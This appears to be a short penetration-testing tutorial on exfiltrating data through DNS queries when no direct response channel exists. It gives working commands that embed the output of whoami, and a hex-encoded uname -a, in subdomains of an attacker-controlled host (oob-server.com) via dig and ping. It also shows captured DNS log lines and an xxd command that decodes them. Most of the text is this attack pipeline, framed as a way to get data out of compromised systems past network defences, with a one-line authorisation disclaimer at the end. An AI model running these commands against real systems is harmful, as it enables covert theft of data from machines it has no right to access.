In an Out-Of-Band (OOB) situation where direct responses to requests are unavailable, we can leverage DNS (specifically UDP) to exfiltrate data. In this example, we'll demonstrate how to use dig to query DNS and exfiltrate information such as the username (whoami), and how to handle more complex data like the output of uname -a by encoding it before exfiltration.
If you haven't configured your OOB server yet, you can follow this guide:
https://gist.github.com/Spix0r/9661d448a08bf0703b005c3c64aef560
Imagine that we are in a situation where we can only use DNS to communicate, as direct responses are not available. We’ll use the dig command to exfiltrate data to our own DNS server. For example:
dig a +short $(whoami).oob-server.comA sample DNS query log looks like this:
23-Sep-2024 14:30:42.096 queries: info: client @0x7ff012399f00 192.168.50.10#51234 (spidey.oob-server.com): query: **spidey**.oob-server.com IN A -E(0)DC (192.158.1.1) [ECS 192.168.100.0/24/0]Here, we are exfiltrating the username via the DNS A record query, which is captured by our DNS server.
But what if the data you need to exfiltrate is more complex, such as the output of uname -a, which contains spaces and binary characters? This requires encoding before exfiltration. You can use hex or base64 encoding to safely transmit the data via DNS queries.
For instance, to exfiltrate the output of uname -a, we can use the following command:
uname -a | od -A n -t x1 | sed 's/ *//g' | while read exfil; do ping -c 1 $exfil.oob-server.com; doneThis command converts the output of uname -a to a hex string and sends it to our OOB server using DNS queries. A sample log of these queries would look like this:
23-Sep-2024 14:31:13.012 queries: info: client @0x7ff012399f00 192.168.50.5#44650 (44617277696e20596173686f732d4d61.oob-server.com): query: **44617277696e20596173686f732d4d61**.oob-server.com IN A -E(0)DC (192.158.1.1) [ECS 192.168.100.0/24/0]
23-Sep-2024 14:31:13.320 queries: info: client @0x7ff112399f90 192.168.50.15#42485 (63426f6f6b2d50726f2e6c6f63616c20.oob-server.com): query: **63426f6f6b2d50726f2e6c6f63616c20**.oob-server.com IN A -E(0)DC (192.158.1.1) [ECS 192.168.100.0/24/0]
23-Sep-2024 14:31:13.620 queries: info: client @0x7ff112399f90 192.168.52.15#57257 (32312e312e302044617277696e204b65.oob-server.com): query: **32312e312e302044617277696e204b65**.oob-server.com IN A -E(0)DC (192.158.1.1) [ECS 192.168.100.0/24/0]Once the DNS queries have been captured, the next step is to extract the hex-encoded subdomains from the logs and decode the data back into its original form. Here’s a command to decode it:
echo "44617277696e20596173686f732d4d6163426f6f6b2d50726f2e6c6f63616c2032312e312e302044617277696e204b65726e656c2056657273696f6e2032312e312e303a20576564204f63742031332031373a33333a32342050445420323032313b20726f6f743a786e752d383031392e34312e357e312f52454c454153455f41524d36345f54383130312061726d36340a" | xxd -r -pResulting in the original data:
Darwin Spideys-MacBook-Pro.local 21.1.0 Darwin Kernel Version 21.1.0: Wed Oct 13 17:33:24 PDT 2021; root:xnu-8019.41.5~1/RELEASE_ARM64_T8101 arm64This is a simple yet powerful method to exfiltrate data using DNS in OOB scenarios. By encoding the data and transmitting it via DNS queries, attackers can bypass traditional network protections and sneak data out of compromised systems.
Note: This technique should be used strictly for research and educational purposes. Always ensure you have appropriate authorization before conducting any security assessments involving data exfiltration.